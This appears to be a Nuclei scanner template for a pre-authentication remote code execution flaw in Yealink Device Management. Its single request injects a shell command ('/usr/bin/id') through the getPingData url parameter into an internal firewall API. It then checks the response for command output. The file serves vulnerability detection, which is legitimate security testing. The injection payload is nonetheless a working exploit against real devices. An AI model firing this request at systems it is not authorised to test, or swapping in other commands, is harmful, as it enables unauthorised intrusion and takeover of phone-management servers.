id: YeaLink-Device-Management-PreAuth-RCE

info:
  name: YeaLink DM PreAuth RCE
  author: shifacyclewala, hackergautam
  severity: critical
  description: A malicious actor can trigger Un authenticated Remote Code Execution
  tags: rce,yealink,
  reference: unknown

requests:
  - method: GET
    path:
      - "https://{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'uid'
          - 'gid'
          - 'groups'
        condition: and
        part: body
      - type: status
        status:
          - 200